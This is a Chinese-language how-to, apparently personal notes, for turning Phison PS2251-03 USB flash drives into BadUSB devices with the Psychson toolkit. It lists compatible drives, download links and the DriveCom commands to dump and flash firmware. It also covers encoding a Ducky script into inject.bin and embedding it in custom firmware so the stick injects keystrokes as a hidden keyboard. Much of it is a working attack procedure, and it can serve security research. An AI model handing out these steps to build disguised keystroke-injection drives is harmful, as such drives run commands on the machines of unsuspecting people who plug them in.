支援設備

Patriot 8GB Supersonic Xpress*
Kingston DataTraveler 3.0 T111 8GB
Silicon power marvel M60 64GB
Patriot Stellar 64 Gb Phison
Toshiba TransMemory-MX USB 3.0 16GB
Toshiba TransMemory-MX USB 3.0 8GB
Kingston DataTraveler G4 64 GB
Patriot PSF16GXPUSB Supersonic Xpress 16GB
Silicon Power 32GB Blaze B30 (SP032GBUF3B30V1K)
Kingston Digital 8GB USB 3.0 DataTraveler

取得晶片型號

下載 Firmware 與燒錄檔案

Firmware PS2251-03 flash chip

http://www.usbdev.ru/?wpfb_dl=777

編譯環境

Visual Studio 2012

SDCC (Small Device C Compiler 安裝路徑 C:\Program Files\SDCC 可以先編譯 DriveCom 和 Injector

可以插入 usb 用 DriveCom 看看有沒有東西 tools\DriveCom.exe /drive=D /action=GetInfo

DumpFirmware

DriveCom.exe /drive=E /action=DumpFirmware /firmware=[firmware]

Flashing Custom Firmware

確認在BootMode

tools\DriveCom.exe /drive=E /action=SetBootMode
tools\DriveCom.exe /drive=D /action=SendExecutable /burner=[burner.bin]
tools\DriveCom.exe /drive=D /action=SendFirmware /burner=[burner.bin] /firmware=[firmware]

HID Payload

下載 https://code.google.com/p/ducky-decode/

先把 payload.txt 轉成 .bin

需安裝 Java Runtime Environment

java -jar encoder.jar -i payload.txt -o inject.bin

生成 inject.bin 以後還需要一個客製化的 Firmware，去 Psychson-master\firmware build bin 資料夾裡面有 fw.bin 複製出來

把 inject.bin 注入到 fw.bin

tools\EmbedPayload.exe inject.bin fw.bin
tools\DriveCom.exe /drive=D /action=SetBootMode
tools\DriveCom.exe /drive=D /action=SendExecutable /burner=bn.bin
tools\DriveCom.exe /drive=D /action=SendFirmware /burner=bn.bin /firmware=fw.bin

如何重刷 Firmware 與恢復原本可以用的USB

重刷必須進入 BootMode 但是有時無法用指令的方式進入，所以必須用短路法參考竹中的腳位，拿單心線或是小剪刀之類的放在上面再插進去 USB

Psychson-master\docs\PinsToShortUponPlugInForBootMode.jpg

變回原本USB可以用MPALL v3.71.0A_03 MLC(UP03 64pin)

http://www.usbdev.ru/?wpfb_dl=4388

支援設備#

取得晶片 型號#

編譯環境#

DumpFirmware#

Flashing Custom Firmware#

HID Payload#

如何重刷 Firmware 與恢復原本可以用的USB#